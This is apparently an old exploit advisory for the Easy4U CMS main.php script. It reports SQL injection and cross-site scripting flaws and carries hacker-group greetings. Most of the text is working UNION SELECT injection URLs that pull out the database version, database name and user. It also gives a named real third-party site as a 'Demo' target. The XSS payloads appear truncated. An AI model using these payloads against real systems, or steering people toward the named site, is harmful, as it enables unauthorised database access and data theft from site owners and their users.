[~]----------------------------------------------------------------------- [~] Easy4U CMS [main.php] - Multiple Remote Vulnerabilities [~] [~] http://www.ekkelenkamp.nl/Content_Management-pages-id-17.htm [~] ---------------------------------------------------------- [~] Bug founded by d3v1l [~] [~] Date: 29.09.2008 [~] [~] [~] d3v1l@spoofer.com [~] [~] ----------------------------------------------------------- [~] Greetz tO ALL:- [~] [~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) [~] [~] Pentest| Gibon| Pig AND milw0rm staff [~]------------------------------------------------------------- [~] Exploit :- SQL Injection [~] [~] http://site.com/main.php?pag=pages&id=1' UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* [~] http://site.com/main.php?pag=pages&id=1' UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/* [~] [~] [on some site works only using LIMIT 1,1] [~] [~] Demo :- [~] [~] http://charcot-ms.eu/main.php?pag=pages&id=1' UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/* [~] [~]------------------------------------------------------------------------------------------------------------------------------------- [~] [~] Exploit :- XSS (cross site scripting) [~] [~] http://site.com/main.php?pag=search "> [~] [~] [~] Demo :- [~] [~] http://charcot-ms.eu/main.php?pag=search -> try to put in search box something like -> "> [~]--------------------------------------------------------------------------------------------------------------------------------------